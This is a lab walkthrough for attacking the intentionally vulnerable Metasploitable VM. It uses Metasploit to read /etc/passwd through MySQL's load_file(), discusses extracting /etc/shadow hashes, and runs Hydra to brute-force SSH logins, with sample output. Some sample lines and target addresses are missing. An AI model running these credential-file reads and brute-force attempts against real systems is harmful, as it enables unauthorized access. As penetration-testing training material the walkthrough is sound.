From charlesreid1

This walks through using Hydra to brute-force login information on Metasploitable.

Aslo see Hydra.


The first challenge, when cracking SSH credentials via brute force, is to find usernames. There are two methods to do this:

  • Guess usernames from services
  • Obtain usernames from a file on the machine

It would be great if we could log in via SSH as root, but this is usually disabled. To be successful, we will need a list of users on the system. This can be obtained many ways, but two methods using SQL servers are covered in Metasploitable/MySQL and Metasploitable/Postgres. Both pages cover techniques for obtaining /etc/passwd contents with metasploit.

Once we find usernames, we can try and crack the passwords.

  • For password wordlists, use SecLists from Daniel Miessler on Github:
  • If we have usernames only, use Hydra to brute-force credentials
  • If we have usernames and password hashes, use John the Ripper to brute-force credentials


Finding Usernames via Services

Oftentimes services will create users and will not disable SSH for those accounts. If you're lucky, the security will be lower for these service usernames. For example, if a server is running Postgresql, there should be a "postgres" username, it may allow you to log in, and it may even have the password "postgres".

Finding Usernames via MySQL

Hydra can be used to brute-force the SSH credentials. If you have a good guess for the username and password, then use Hydra.

However, if you don't know what username to use, and you know there is a MySQL serer listening, you can crack the MySQL server's password, and use the load_file() function in SQL to obtain the /etc/passwd or /etc/shadow file, and use those to obtain usernames and possibly password hashes. These may in turn lead to SSH usernames and passwords. It's a bit cumbersome, but who knows, you might get lucky and find some low-hanging fruit.

Obtaining Usernames Using SQL load_file Function

Usernames on the machine can be obtained from /etc/passwd if we get SQL credentials on the remote machine, because SQL has a load_file() function.

Here's the recap of getting the contents of that file from the Metasploitable machine's MySQL server (username is root, password is blank) using Metasploit:

Start metasploit:

root@morpheus:~# msfconsole

We're going to use a MySQL exploit, so load it up:

msf > use auxiliary/admin/mysql/mysql_sql

Once we load the MySQL exploit, we have to set the username and password to use. This requires us to know the username/password. You can try an empty password, or the word "password", or etc. On Metasploitable, no MySQL password is set by default:

msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set PASSWORD ''
msf auxiliary(mysql_sql) > set RHOST

Last, we set the SQL statement that we want Metasploit to run once it connects:

msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')
SQL => select load_file('/etc/passwd')
msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select load_file('/etc/passwd')'...
[*]  | root:x:0:0:root:/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
[*] Auxiliary module execution completed

Reading /etc/shadow

We can also grab the /etc/shadow file, which contains password hashes. Some sample lines:


There are 8 fields here:

  • Username : It is your login name.
  • Password : It is your encrypted password. The password should be minimum 6-8 characters long including special characters/digits and more.
  • Last password change (lastchanged) : Days since Jan 1, 1970 that password was last changed
  • Minimum : The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password
  • Maximum : The maximum number of days the password is valid (after that user is forced to change his/her password)
  • Warn : The number of days before password is to expire that user is warned that his/her password must be changed
  • Inactive : The number of days after password expires that account is disabled
  • Expire : days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.

The most important two fields, then are the first two:


The root and sys users can both log in, and we have the hash of their passwords.

However, the * (or a ! character) in place of a password hash means that account cannot be used for remote logins.

This reduces the list of usable usernames to:

root@morpheus:~# cat users_file



Hydra is a brute-force SSH tool. It works by trying usernames/passwords remotely. It is very slow and should only be used as a last-ditch attempt.


If we just type hydra, we can see the basic usage:

root@morpheus:~# hydra 
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

From the help message, you can see Hydra supports cracking many more services than just SSH:

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

Reality Check

Quick reality check: brute-forcing SSH logins is very slow (limited by how many SSH connections a victim's SSH server will accept), so if you have access to /etc/shadow, you might as well crack those passwords offline with John the Ripper.

Using Hydra to Crack SSH Credentials

Once we have a list of users, we can put that in a file and pass it to Hydra using the -L flag. We then pass a list of passwords to try using the -P flag. Here's a sample command:

# hydra -L users_file -P 500-worst-passwords.txt ssh://
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2016-03-25 21:45:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 3549 login tries (l:7/p:507), ~13 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 3505 todo in 01:20h, 4 active

This is extremely slow when compared to an offline password-cracking method like John the Ripper - if we have the /etc/shadow file, we should probably use that, instead of trying to brute-force SSH logins.

Brute-forcing SSH logins requires a lot of time, a lot of patience, and a series of very good guesses. In general, it is not terribly practical.

John the Ripper

If we are able to obtain a list of users and their password hashes, e.g., from /etc/shadow, we can use John to try and crack passwords via brute force offline.

Use John to Crack Credentials

See Metasploitable/John_Shadow_File


You can also brute force an SSH login with Metasploitable - use the auxiliary/scanner/ssh/ssh_login module.

See Metasploitable/SSH/Exploits#Brute_Force_ssh_login